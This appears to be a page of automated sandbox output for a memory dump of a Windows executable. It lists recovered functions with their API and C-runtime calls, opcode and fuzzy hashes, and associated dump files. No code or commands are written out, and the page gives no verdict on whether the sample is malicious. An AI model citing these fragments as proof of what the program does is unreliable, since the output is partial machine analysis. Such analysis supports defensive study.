API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
Instruction ID: 69d425b7a28c532f37cd6811ccdc718d459e0bb7a035288f7ac6f2a0bf7e8d8b
Opcode Fuzzy Hash: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
Instruction Fuzzy Hash: AB517FB5D04218AFDF249F64CC81A9EBBBAEF49300F1004AEF209A7251DB355E90CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00160BD0, Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 00160BF2

Part of subcall function 00145B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,001A7B20,?,?,00000000), ref: 00145B8C
Part of subcall function 00145B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,001A7B20,?,?,00000000,?,?), ref: 00145BB0

_fprintf.LIBCMT ref: 00160C29
OutputDebugStringW.KERNEL32(?), ref: 00196331

Part of subcall function 00164CDA: _flsall.LIBCMT ref: 00164CF3

__setmode.LIBCMT ref: 00160C5E

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: abd14f3d20f11e76dd3afb07f62bf5ada4f914fd33ebe9c6ccdc725fde3c9919
Instruction ID: 2b24be12653871e6d5330e5ee0f3004ff11c999f9e190f5a82a77601c0bd2558
Opcode Fuzzy Hash: abd14f3d20f11e76dd3afb07f62bf5ada4f914fd33ebe9c6ccdc725fde3c9919
Instruction Fuzzy Hash: 5E1129329042047FCB09B7B4AC879BF7B69DFA5320F14015AF104972D2EF215DA697A5

Uniqueness

Uniqueness Score: -1.00%

Function 00144531, Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00144560

Part of subcall function 0014410D: _memset.LIBCMT ref: 0014418D
Part of subcall function 0014410D: _wcscpy.LIBCMT ref: 001441E1
Part of subcall function 0014410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 001441F1

KillTimer.USER32(?,00000001,?,?), ref: 001445B5
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 001445C4
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0017D6CE

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: 118ce74942efcc3c2fb58c2d2201c92c640b1d0c0eea57572a6fb20eaeb48fa9
Instruction ID: e122f7f0563351709653b06ebc5b63003593c1fd658177e988c11c95b42c3c70
Opcode Fuzzy Hash: 118ce74942efcc3c2fb58c2d2201c92c640b1d0c0eea57572a6fb20eaeb48fa9
Instruction Fuzzy Hash: FC21C9B0904788AFEB328B24DC59BE7BFFD9F11304F04409DE69E5A251C7745A85CB51

Uniqueness

Uniqueness Score: -1.00%

Function 001473E5, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0017EE62
GetOpenFileNameW.COMDLG32(?), ref: 0017EEAC

Part of subcall function 001448AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001448A1,?,?,001437C0,?), ref: 001448CE

Part of subcall function 001609D5: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 001609F4

Strings

X, xrefs: 0017EE7A

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: 3f3c8462a79343c04aeb3b86af7109cf196e0cdd06d2e8a2df4d42fabc944280
Instruction ID: 617b1a16efef64f5d8b5af65723783c4c2d1137342cb84d1b0f8a8674d3a4fb2
Opcode Fuzzy Hash: 3f3c8462a79343c04aeb3b86af7109cf196e0cdd06d2e8a2df4d42fabc944280
Instruction Fuzzy Hash: 8021D170A102889BCB059F94C805BEE7BF99F49304F00805AE408B7281DBB449898BA1

Uniqueness

Uniqueness Score: -1.00%

Function 001443DB, Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00144401
Shell_NotifyIconW.SHELL32(00000000,?), ref: 001444A6
Shell_NotifyIconW.SHELL32(00000001,?), ref: 001444C3

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: db16940ff0285cfdcca2045bc1486fcaf0bf4df0c278aef7e6db75f1c03bbebe
Instruction ID: 35ce613f93e961cc4c3954636ae62deb62d20088017696215630d6cf3715fae4
Opcode Fuzzy Hash: db16940ff0285cfdcca2045bc1486fcaf0bf4df0c278aef7e6db75f1c03bbebe
Instruction Fuzzy Hash: 5D3194B06057018FD720DF34E888B9BBBF8FB59314F04092EF99A83251D775A948CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0016594C, Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00165963

Part of subcall function 0016A3AB: __NMSG_WRITE.LIBCMT ref: 0016A3D2
Part of subcall function 0016A3AB: __NMSG_WRITE.LIBCMT ref: 0016A3DC

__NMSG_WRITE.LIBCMT ref: 0016596A

Part of subcall function 0016A408: GetModuleFileNameW.KERNEL32(00000000,002043BA,00000104,?,00000001,00161013), ref: 0016A49A
Part of subcall function 0016A408: ___crtMessageBoxW.LIBCMT ref: 0016A548

Part of subcall function 001632DF: ___crtCorExitProcess.LIBCMT ref: 001632E5
Part of subcall function 001632DF: ExitProcess.KERNEL32 ref: 001632EE

Part of subcall function 00168D68: __getptd_noexit.LIBCMT ref: 00168D68

RtlAllocateHeap.NTDLL(00A80000,00000000,00000001,?,?,?,?,00161013,?,0000FFFF), ref: 0016598F

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 5a3475f9507b36a0e06d3185f21d077e6ca03695a35b2ef9f5cc5127337a162c
Instruction ID: 92d7a996fb254f24d42a2f9d6eadb8f714bb1cd9394ad98e5de7f98b860cac8a
Opcode Fuzzy Hash: 5a3475f9507b36a0e06d3185f21d077e6ca03695a35b2ef9f5cc5127337a162c
Instruction Fuzzy Hash: C501F132340B15DEE7253B74EC42A2E729A9F62738F51012AFA01AB2C2DF709D618670

Uniqueness

Uniqueness Score: -1.00%

Function 0014FB0A, Relevance: 4.6, APIs: 3, Instructions: 50comCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32 ref: 0014FB2D
OleInitialize.OLE32(00000000), ref: 0014FBAA
FindCloseChangeNotification.KERNEL32(00000000), ref: 001849F2

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: ChangeCloseFindHandleInitializeNotification
String ID:
API String ID: 3028023258-0
Opcode ID: a752dcc6a7374ddbbfb117c1ccfa12e2bd9ebaeb58b0f03e31aeba272b684b50
Instruction ID: 7d1999f1dadabd235929c221577c8b173e6769d990e582ce53251b5673fcdc86
Opcode Fuzzy Hash: a752dcc6a7374ddbbfb117c1ccfa12e2bd9ebaeb58b0f03e31aeba272b684b50
Instruction Fuzzy Hash: BE1143B1905390CEE325DF69BC9C215BFE4EBAA314B14803FC4048B2B3D7704466CB96

Uniqueness

Uniqueness Score: -1.00%

Function 001A8F97, Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 001A8FA5

Part of subcall function 00162F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00169C64,00000000,00168D6D,001659D3,?), ref: 00162FA9
Part of subcall function 00162F95: GetLastError.KERNEL32(00000000,?,00169C64,00000000,00168D6D,001659D3,?), ref: 00162FBB

_free.LIBCMT ref: 001A8FB6
_free.LIBCMT ref: 001A8FC8

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
Instruction ID: cfc758f9dcf6a449e9aa543df3a2c59ac6c22adaa4308e501787b24dd7a6e340
Opcode Fuzzy Hash: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
Instruction Fuzzy Hash: 6EE012A1B09B024ECA24A578AD44A9357EE5F49351B18085DF409DB142DF34EC518124

Uniqueness

Uniqueness Score: -1.00%

Function 001A6F08, Relevance: 4.5, APIs: 3, Instructions: 21COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,00000000,?,00000002,?,?,001A6C34,00000000), ref: 001A6F1E
GetCurrentProcess.KERNEL32(?,00000000,?,001A6C34,00000000), ref: 001A6F26
DuplicateHandle.KERNELBASE(00000000,?,001A6C34,00000000), ref: 001A6F2D

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentProcess$DuplicateHandle
String ID:
API String ID: 1294930198-0
Opcode ID: 43a8b8ec84e3e1c45d047fa615f369ecfb97089ad612b9f5b847c3fe79485a39
Instruction ID: e26ac64b3d35c588dbc2a2d76ce03026223abadcf0615fe1e020987254531fcd
Opcode Fuzzy Hash: 43a8b8ec84e3e1c45d047fa615f369ecfb97089ad612b9f5b847c3fe79485a39
Instruction Fuzzy Hash: 0AD017BB148309BBC7015B95EC09F3ABA2EEB96B62F18002DF605855508B70C4426620

Uniqueness

Uniqueness Score: -1.00%

Function 001A6D60, Relevance: 4.5, APIs: 3, Instructions: 17COMMON

Download Yara Rule

APIs

Part of subcall function 001A74D2: InterlockedExchange.KERNEL32(?,?), ref: 001A74E5
Part of subcall function 001A74D2: EnterCriticalSection.KERNEL32(?,?,00151044,?,?), ref: 001A74F6
Part of subcall function 001A74D2: TerminateThread.KERNEL32(00000000,000001F6,?,00151044,?,?), ref: 001A7503
Part of subcall function 001A74D2: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00151044,?,?), ref: 001A7510
Part of subcall function 001A74D2: InterlockedExchange.KERNEL32(?,000001F6), ref: 001A7523
Part of subcall function 001A74D2: LeaveCriticalSection.KERNEL32(?,?,00151044,?,?), ref: 001A752A

CloseHandle.KERNEL32(?,?,001A6DC6), ref: 001A6D71
FindCloseChangeNotification.KERNEL32(?,?,001A6DC6), ref: 001A6D7A
DeleteCriticalSection.KERNEL32(?,?,001A6DC6), ref: 001A6D8D

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$CloseExchangeInterlocked$ChangeDeleteEnterFindHandleLeaveNotificationObjectSingleTerminateThreadWait
String ID:
API String ID: 744473657-0
Opcode ID: 3d81f112614bf8949a7da40435bf9bc7e8bfca9864cde4ea212e00aa472ef361
Instruction ID: a4c8d8f20b48b3e621bab2fdab3e4a8d1addf47bc0b03b7f8629b443ed91ca5c
Opcode Fuzzy Hash: 3d81f112614bf8949a7da40435bf9bc7e8bfca9864cde4ea212e00aa472ef361
Instruction Fuzzy Hash: E3E0EC36000546BBCB052FB5FD08809BFBABF983003549126F00191D30CB7094F6CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0014AB23, Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

CALL, xrefs: 0018002B

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: 29407ff605da4e00a7d3e01bbdaa7b254b9ed45888664a257fc1e62c6d833abb
Instruction ID: c936aaded331585efdd9221cbfc049a029b6805964d25c9dc9876e965ab2ad2c
Opcode Fuzzy Hash: 29407ff605da4e00a7d3e01bbdaa7b254b9ed45888664a257fc1e62c6d833abb
Instruction Fuzzy Hash: 82224770508251DFCB29DF14C494B6ABBE1BF98300F56895DF89A8B262D731ED85CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00144DD0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00144E1A

Strings

EA06, xrefs: 0017DCF5

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: _memmove
String ID: EA06
API String ID: 4104443479-3962188686
Opcode ID: df9c8454a35af8d2ba77ead66dbe55970182de8bb3ee116f89c120222801e0cf
Instruction ID: 0f209934873a2461a90ddda50679e98b052d2462ca5771c924810793a26c7d4f
Opcode Fuzzy Hash: df9c8454a35af8d2ba77ead66dbe55970182de8bb3ee116f89c120222801e0cf
Instruction Fuzzy Hash: 2D416A71A041586BDF259F68C8517BE7FB6BF15300F294075F882BB2A3C7299D8493E1

Uniqueness

Uniqueness Score: -1.00%

Function 0014492E, Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00144992

Part of subcall function 001635AC: __lock.LIBCMT ref: 001635B2
Part of subcall function 001635AC: DecodePointer.KERNEL32(00000001,?,001449A7,001981BC), ref: 001635BE
Part of subcall function 001635AC: EncodePointer.KERNEL32(?,?,001449A7,001981BC), ref: 001635C9

Part of subcall function 00144A5B: SystemParametersInfoW.USER32 ref: 00144A73
Part of subcall function 00144A5B: SystemParametersInfoW.USER32 ref: 00144A88

Part of subcall function 00143B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00143B7A
Part of subcall function 00143B4C: IsDebuggerPresent.KERNEL32 ref: 00143B8C
Part of subcall function 00143B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,002062F8,002062E0,?,?), ref: 00143BFD
Part of subcall function 00143B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00143C81

SystemParametersInfoW.USER32 ref: 001449D2

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: bb1ab677bf911bb50b56937449a80a8c01e2b4803f6626359044bedd6fd10ec6
Instruction ID: c809500b5d7004f83ccdc71a921c54fa68499208cd51b9df7028efdb01a061a3
Opcode Fuzzy Hash: bb1ab677bf911bb50b56937449a80a8c01e2b4803f6626359044bedd6fd10ec6
Instruction Fuzzy Hash: EB113A719183119FC700EF29EC4990AFFF8EBA9710F10452EF455872B2DBB09665CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00160FF6, Relevance: 3.0, APIs: 2, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 0016594C: __FF_MSGBANNER.LIBCMT ref: 00165963
Part of subcall function 0016594C: __NMSG_WRITE.LIBCMT ref: 0016596A
Part of subcall function 0016594C: RtlAllocateHeap.NTDLL(00A80000,00000000,00000001,?,?,?,?,00161013,?,0000FFFF), ref: 0016598F

std::exception::exception.LIBCMT ref: 0016102C
__CxxThrowException@8.LIBCMT ref: 00161041

Part of subcall function 001687DB: RaiseException.KERNEL32(?,?,0000FFFF,001FBAF8,?,?,?,?,?,00161046,0000FFFF,001FBAF8,?,00000001), ref: 00168830

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: e6e614f53b0c803bfe7dc5bc4f4f212c5faff0f2ed746a6577844293ad402893
Instruction ID: b0ec3a3eee1e2fc63cc4700832e6de54140d620ff4fcb877c6d69e91b8a441b7
Opcode Fuzzy Hash: e6e614f53b0c803bfe7dc5bc4f4f212c5faff0f2ed746a6577844293ad402893
Instruction Fuzzy Hash: 8EF0283550021DB7CF20BB98ED019DF7BAD9F20351F240466F814A2281EFB08AA082E0

Uniqueness

Uniqueness Score: -1.00%

Function 001655D6, Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 00168D68: __getptd_noexit.LIBCMT ref: 00168D68

__lock_file.LIBCMT ref: 0016561B

Part of subcall function 00166E4E: __lock.LIBCMT ref: 00166E71

__fclose_nolock.LIBCMT ref: 00165626

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 55a13e6fa47e06564eae466df685258cbfe6cecb0b22ae882340873c49d12f73
Instruction ID: 96c78f0887f6d108f1c191b14c367030289743546d87a562b098a20b829dd3b7
Opcode Fuzzy Hash: 55a13e6fa47e06564eae466df685258cbfe6cecb0b22ae882340873c49d12f73
Instruction Fuzzy Hash: F9F0BE71801A159ADB20AF79CC0276E7BA26F61334F668209A425AB1C1CF7C8A61DB95

Uniqueness

Uniqueness Score: -1.00%

Function 001A6CC1, Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000FA0), ref: 001A6CE6
InterlockedExchange.KERNEL32(?,00000000), ref: 001A6D08

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: CountCriticalExchangeInitializeInterlockedSectionSpin
String ID:
API String ID: 4104817828-0
Opcode ID: 0305420bff81213b09685ae02d1297835aa904e662d589daabcf62a1d31d271d
Instruction ID: c99a366af576b693f6337c6ed84e9aa6115a077054f0472ffa5bc898fc43179e
Opcode Fuzzy Hash: 0305420bff81213b09685ae02d1297835aa904e662d589daabcf62a1d31d271d
Instruction Fuzzy Hash: 13F03AB11007059FC7209F16D944C57FBECFF95710B00882EE48583A10D7B4A441CB51

Uniqueness

Uniqueness Score: -1.00%

Function 001444CB, Relevance: 3.0, APIs: 2, Instructions: 25windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 001444F7
Shell_NotifyIconW.SHELL32(00000002,?), ref: 00144527

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: IconNotifyShell__memset
String ID:
API String ID: 928536360-0
Opcode ID: 4a845bdb59ab937b36fa6e44f4cce655a0ec1ee370373f5830b3d60172abd5e1
Instruction ID: 9bfffbbfb9132c172dce9a80f86abe3f03115ffa4b963d748b23352448a8faad
Opcode Fuzzy Hash: 4a845bdb59ab937b36fa6e44f4cce655a0ec1ee370373f5830b3d60172abd5e1
Instruction Fuzzy Hash: 2CF0A7709043089FDB528B24EC4D7957BBC970030CF0001EAAE0896293D7754B98CF91

Uniqueness

Uniqueness Score: -1.00%

Function 001632DF, Relevance: 3.0, APIs: 2, Instructions: 7COMMON

Download Yara Rule

APIs

___crtCorExitProcess.LIBCMT ref: 001632E5

Part of subcall function 001632AB: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,001632EA,00161013,?,00169EFE,000000FF,0000001E,001FBE28,00000008,00169E62,00161013,00161013), ref: 001632BA
Part of subcall function 001632AB: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 001632CC

ExitProcess.KERNEL32 ref: 001632EE

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: ExitProcess$AddressHandleModuleProc___crt
String ID:
API String ID: 2427264223-0
Opcode ID: 3dde6ef814feca3f544b13c9822ea68c9db874e767b19455790712d6ed1f71d3
Instruction ID: c3c735bfbfec47ac012a3b32171ad3dd3d822ab46d0db41493018f424dab8df6
Opcode Fuzzy Hash: 3dde6ef814feca3f544b13c9822ea68c9db874e767b19455790712d6ed1f71d3
Instruction Fuzzy Hash: FBB0923000020CBBCB012F11DC0A8483F3AFF10A90B004028FC1408031DB72AAE3DA80

Uniqueness

Uniqueness Score: -1.00%

Function 0014766F, Relevance: 1.6, APIs: 1, Instructions: 103COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0014774A

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 702c49591981ee8d10fedb2bf00c780e145df1eb1f8789b545df1742b29858e3
Instruction ID: d0cd64da79cf07a32ce31db6845bd57461b29cbecb44c1cbf34d6656f30df6b6
Opcode Fuzzy Hash: 702c49591981ee8d10fedb2bf00c780e145df1eb1f8789b545df1742b29858e3
Instruction Fuzzy Hash: 3D31B479608A02DFD7289F1CC594922F7E1FF08320756C56DE98A8B7B5E730D891CB94

Uniqueness

Uniqueness Score: -1.00%

Function 001800D6, Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 001800E1

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: ClearVariant
String ID:
